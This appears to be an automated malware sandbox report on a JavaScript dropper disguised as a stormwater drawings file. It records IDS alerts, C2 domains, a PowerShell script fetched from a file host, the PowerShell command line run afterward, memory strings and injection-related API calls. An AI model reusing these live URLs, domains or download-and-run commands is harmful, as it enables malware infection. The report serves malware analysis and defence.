Source: Network traffic	Suricata IDS: 2018856 - Severity 1 - ET MALWARE Windows executable base64 encoded : 108.181.20.35:443 -> 192.168.2.4:49731

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 108.181.20.35 443

Source:	DNS query: www.l63339.xyz
Source:	DNS query: www.seasay.xyz

Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 103.106.67.112 103.106.67.112

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /et18ob.ps1 HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: files.catbox.moeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /vhr7/?Cf=xxUlW2vX-dIPmnP0&CL=iaSfD1StI7hDT4qLPsiE2zQeJuTNjk7n7gYmLjmbAGxKTACTDmsoqhtbBCAt1Ym3ncJClzXtgr7Snspij9c4t0mW0LdNsZ/ysFr93T3fDTPWMGFwNTiC4gY= HTTP/1.1Host: www.l63339.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
Source: global traffic	HTTP traffic detected: GET /c9ts/?CL=b2h4705j/BXuiRKuOXJLA/Ych4+2MinMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJnRUVMUOnSQnGJ4mxt7RzM6wNjAHWVIo4recboKbaao8YnR4NtOnxQ=&Cf=xxUlW2vX-dIPmnP0 HTTP/1.1Host: www.seasay.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
Source: global traffic	HTTP traffic detected: GET /k566/?CL=RARW43WNMKajmHobqktuR6SSs++r69WXvXreCHJ6fEp5jkldk9mcWmm/U2k918FOdcoJ/x5nnQwLxIae2MHe/M4SnSZZuBmldonFkNjvznFjfMe0yaUlTKw=&Cf=xxUlW2vX-dIPmnP0 HTTP/1.1Host: www.tumbetgirislinki.fitAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
Source: global traffic	HTTP traffic detected: GET /jgkl/?CL=hI+cEEoDMRK5HtHm8YVaI3XtV/YoH3Lo+nuR9x41ri89hVkyLZ4bVRvwmPB4YpqMZl4/b+D+8qc7dcfD2Dlpb+tzlxPeBCypiVc63m5lwzFSO9V29/TaR1k=&Cf=xxUlW2vX-dIPmnP0 HTTP/1.1Host: www.lucynoel6465.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5

Source: global traffic	DNS traffic detected: DNS query: files.catbox.moe
Source: global traffic	DNS traffic detected: DNS query: www.l63339.xyz
Source: global traffic	DNS traffic detected: DNS query: www.seasay.xyz
Source: global traffic	DNS traffic detected: DNS query: www.tumbetgirislinki.fit
Source: global traffic	DNS traffic detected: DNS query: www.lucynoel6465.shop
Source: global traffic	DNS traffic detected: DNS query: www.kjuw.party

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 06:27:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jCeIMMnqMMFFI%2BlwHSDajFErDmmz41QnOVNOx0rK50c%2BN2Bj0uSZzppBxMZZDtM6iiw%2Bn4WRvQkl8Y%2FWFcoMNgz7u0xgnmtfaj9mnEK9xKwVi8FOICtm5rqgv2a30bRapurIsfxvzT1W0Gk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9175a19988921a3c-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1805&min_rtt=1805&rtt_var=902&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=822&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e2 e2 e2 02 00 00 00 ff ff 0d 0a Data Ascii: 13
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 06:27:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WhtYQy34ypiJMud%2FYCMH6vF95b5ee32LJHcoUCkAQEcgZGdt7%2BfwwGBrD5Grarvce4dgE8K2FBpRSvK6FngvjqJOrpK%2BTxy7ye7ZIN0jA0JEr2kSNidopkX4DBKmPKDoDAFN5H20YmqlpZY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9175a1c958cc41d9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1570&min_rtt=1570&rtt_var=785&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=550&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 06:27:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FLdgrhHb6T8Szvn0ZyKW8HXjaj74W3YlDzrsb%2BWNnXlB1c4nvJOsiGqxjj1byMkH9cyfSbD4krFZIMDmtHieoW2Hp%2Fzme%2FiST0AATADv%2FS98h%2FB36kTrShaE8obun%2FL9kShq%2BOnwb74%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9175a1ed4f184337-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1554&min_rtt=1554&rtt_var=777&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=813&delivery_rate=0&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 06:28:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sNXeA64Xn6B4eCVrWaxkSxKXt9N7f0YNybDLIkTUMlArGbuPJYkmTPy%2BSQx0zp1fEdc%2BiYQPnI%2FjQPW9lQROqf0CSd%2FNdf65jlDQdExMWfXSvYKrDo5tMCZTenq%2BHr2B3qvoac93ljo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9175a1fd3e0b72a1-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1787&min_rtt=1787&rtt_var=893&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=833&delivery_rate=0&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzJaC0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 06:28:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QrP%2FRNnnuUXY%2FsfBGEO8AuSUtmmm21xyeO7VUugTZcDpE3h2f6D9WU%2Br%2BtNY3XO%2B%2FNKW45glVtKhLsYTkJ1rB0JK28ZxqGtOpA0chqXqjoJZ%2BS8ybkybjD%2FOEDCcSkQ52p7lggBRu64%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9175a20d5a077d1e-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1999&min_rtt=1999&rtt_var=999&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10915&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzJaC0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 06:28:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MuKX9aDEknwnTvu%2B6ps3OXMeP2DMltFKFqPZgJ6yDgb8zjK3IDQpA6JPEASzLMgJrP5GfLmOmb%2BDnOzYzoZVHNHulLCAOuGE2OfqbsaQkVvNaoCWag8VQhfJj1PGXHTARdaqGKTMc14%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9175a21d39554264-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1718&min_rtt=1718&rtt_var=859&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=547&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Tue, 25 Feb 2025 06:28:11 GMTEtag: "6746afef-94"Server: nginxX-Cache: BYPASSConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Tue, 25 Feb 2025 06:28:14 GMTEtag: "6746afef-94"Server: nginxX-Cache: BYPASSConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Tue, 25 Feb 2025 06:28:16 GMTEtag: "6746afef-94"Server: nginxX-Cache: BYPASSConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: runonce.exe, 00000009.00000002.2976180128.0000000005268000.00000004.10000000.00040000.00000000.sdmp, xBjKgBCuI1jq.exe, 0000000A.00000002.2975872831.0000000003598000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
Source: powershell.exe, 00000001.00000002.1741112479.000001CFCC52A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1778622855.000001CFDAE3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1741112479.000001CFCAFF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1741112479.000001CFCBFC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1741112479.000001CFCADC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1741112479.000001CFCBFC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000001.00000002.1741112479.000001CFCAFF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1741112479.000001CFCBFC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: xBjKgBCuI1jq.exe, 0000000A.00000002.2975394799.00000000029C6000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.kjuw.party
Source: xBjKgBCuI1jq.exe, 0000000A.00000002.2975394799.00000000029C6000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.kjuw.party/e0jv/
Source: runonce.exe, 00000009.00000002.2977845167.0000000007668000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000001.00000002.1741112479.000001CFCADC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: runonce.exe, 00000009.00000002.2977845167.0000000007668000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: runonce.exe, 00000009.00000002.2977845167.0000000007668000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: runonce.exe, 00000009.00000002.2977845167.0000000007668000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000001.00000002.1778622855.000001CFDAE3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1778622855.000001CFDAE3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1778622855.000001CFDAE3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: runonce.exe, 00000009.00000002.2977845167.0000000007668000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: runonce.exe, 00000009.00000002.2977845167.0000000007668000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: runonce.exe, 00000009.00000002.2977845167.0000000007668000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: wscript.exe, 00000000.00000002.1801684145.0000023136B9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.ca
Source: wscript.exe, 00000000.00000002.1801873166.00000231390B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1801585342.00000231369F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1798831358.00000231369F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe
Source: wscript.exe, 00000000.00000002.1801873166.00000231390B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/
Source: wscript.exe, 00000000.00000003.1691274229.00000231386CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/e
Source: wscript.exe, 00000000.00000003.1690479875.00000231386BA000.00000004.00000020.00020000.00000000.sdmp, Stormwater Works Drawings Spec.js	String found in binary or memory: https://files.catbox.moe/et18ob.ps1
Source: wscript.exe, 00000000.00000003.1799104824.00000231369E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1798911413.00000231369DC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1801563846.00000231369E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/et18ob.ps1)
Source: wscript.exe, 00000000.00000003.1800210275.00000231388B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/et18ob.ps1D
Source: wscript.exe, 00000000.00000003.1687859855.0000023138681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/et18ob.ps1g2
Source: wscript.exe, 00000000.00000002.1801873166.00000231390B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/j
Source: wscript.exe, 00000000.00000002.1801873166.00000231390B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1801585342.00000231369F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1798831358.00000231369F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe;
Source: powershell.exe, 00000001.00000002.1741112479.000001CFCAFF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1741112479.000001CFCBFC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: runonce.exe, 00000009.00000002.2974317535.00000000026FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: runonce.exe, 00000009.00000002.2974317535.00000000026FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: runonce.exe, 00000009.00000002.2974317535.00000000026FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: runonce.exe, 00000009.00000002.2974317535.00000000026FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: runonce.exe, 00000009.00000002.2974317535.00000000026FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: runonce.exe, 00000009.00000002.2974317535.00000000026FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: runonce.exe, 00000009.00000003.2392387019.0000000007657000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: powershell.exe, 00000001.00000002.1741112479.000001CFCC52A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1778622855.000001CFDAE3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.1741112479.000001CFCBFC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000001.00000002.1741112479.000001CFCBFC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: runonce.exe, 00000009.00000002.2977845167.0000000007668000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: xBjKgBCuI1jq.exe, 0000000A.00000002.2975872831.0000000003406000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.seasay.xyz/c9ts/?CL=b2h4705j/BXuiRKuOXJLA/Ych4
Source: runonce.exe, 00000009.00000002.2976180128.0000000004F44000.00000004.10000000.00040000.00000000.sdmp, xBjKgBCuI1jq.exe, 0000000A.00000002.2975872831.0000000003274000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2505034564.000000003A3C4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=86884/vhr7/
Source: runonce.exe, 00000009.00000002.2976180128.0000000004F44000.00000004.10000000.00040000.00000000.sdmp, xBjKgBCuI1jq.exe, 0000000A.00000002.2975872831.0000000003274000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2505034564.000000003A3C4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=86884/vhr7/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443

Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\downloaded_script.ps1"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\downloaded_script.ps1"			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0042CAA3 NtClose,	4_2_0042CAA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F635C0 NtCreateMutant,LdrInitializeThunk,	4_2_00F635C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F62B60 NtClose,LdrInitializeThunk,	4_2_00F62B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F62C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_00F62C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F62DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_00F62DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F63090 NtSetValueKey,	4_2_00F63090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F63010 NtOpenDirectoryObject,	4_2_00F63010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F64340 NtSetContextThread,	4_2_00F64340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F64650 NtSuspendThread,	4_2_00F64650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F639B0 NtGetContextThread,	4_2_00F639B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F62AF0 NtWriteFile,	4_2_00F62AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F62AD0 NtReadFile,	4_2_00F62AD0
